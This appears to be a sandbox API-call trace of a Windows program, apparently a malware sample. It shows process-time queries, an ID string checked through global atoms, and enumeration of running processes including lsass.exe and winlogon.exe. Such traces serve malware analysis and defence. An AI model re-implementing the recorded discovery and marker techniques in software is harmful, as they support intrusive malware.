	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetLastError () returned 0x5
	[0128.610] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.611] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0128.611] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] GetLastError () returned 0x5
	[0128.611] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.612] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetLastError () returned 0x5
	[0128.613] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.614] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0128.614] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.614] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0128.614] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0128.614] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0128.614] CloseHandle (hObject=0x2dc) returned 1
	[0128.614] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0128.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.615] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.615] CloseHandle (hObject=0x2dc) returned 1
	[0128.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.615] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.615] CloseHandle (hObject=0x2dc) returned 1
	[0128.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.615] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.616] CloseHandle (hObject=0x2dc) returned 1
	[0128.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.616] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.616] CloseHandle (hObject=0x2dc) returned 1
	[0128.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0128.616] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.616] CloseHandle (hObject=0x2dc) returned 1
	[0128.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0128.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.653] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.653] CloseHandle (hObject=0x2dc) returned 1
	[0128.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.654] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.654] CloseHandle (hObject=0x2dc) returned 1
	[0128.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0128.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.655] CloseHandle (hObject=0x2dc) returned 1
	[0128.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.655] CloseHandle (hObject=0x2dc) returned 1
	[0128.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.656] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.656] CloseHandle (hObject=0x2dc) returned 1
	[0128.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.656] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.656] CloseHandle (hObject=0x2dc) returned 1
	[0128.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.657] CloseHandle (hObject=0x2dc) returned 1
	[0128.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.657] CloseHandle (hObject=0x2dc) returned 1
	[0128.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.658] CloseHandle (hObject=0x2dc) returned 1
	[0128.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.658] CloseHandle (hObject=0x2dc) returned 1
	[0128.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.658] CloseHandle (hObject=0x2dc) returned 1
	[0128.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.659] CloseHandle (hObject=0x2dc) returned 1
	[0128.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.659] CloseHandle (hObject=0x2dc) returned 1
	[0128.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0128.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.660] CloseHandle (hObject=0x2dc) returned 1
	[0128.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0128.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.660] CloseHandle (hObject=0x2dc) returned 1
	[0128.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.660] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.660] CloseHandle (hObject=0x2dc) returned 1
	[0128.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.661] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.661] CloseHandle (hObject=0x2dc) returned 1
	[0128.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.661] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.661] CloseHandle (hObject=0x2dc) returned 1
	[0128.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.662] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.662] CloseHandle (hObject=0x2dc) returned 1
	[0128.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.662] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.662] CloseHandle (hObject=0x2dc) returned 1
	[0128.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.662] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.662] CloseHandle (hObject=0x2dc) returned 1
	[0128.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.663] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.663] CloseHandle (hObject=0x2dc) returned 1
	[0128.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0128.663] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.663] CloseHandle (hObject=0x2dc) returned 1
	[0128.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.664] CloseHandle (hObject=0x2dc) returned 1
	[0128.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.664] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.664] CloseHandle (hObject=0x2dc) returned 1
	[0128.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.665] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.665] CloseHandle (hObject=0x2dc) returned 1
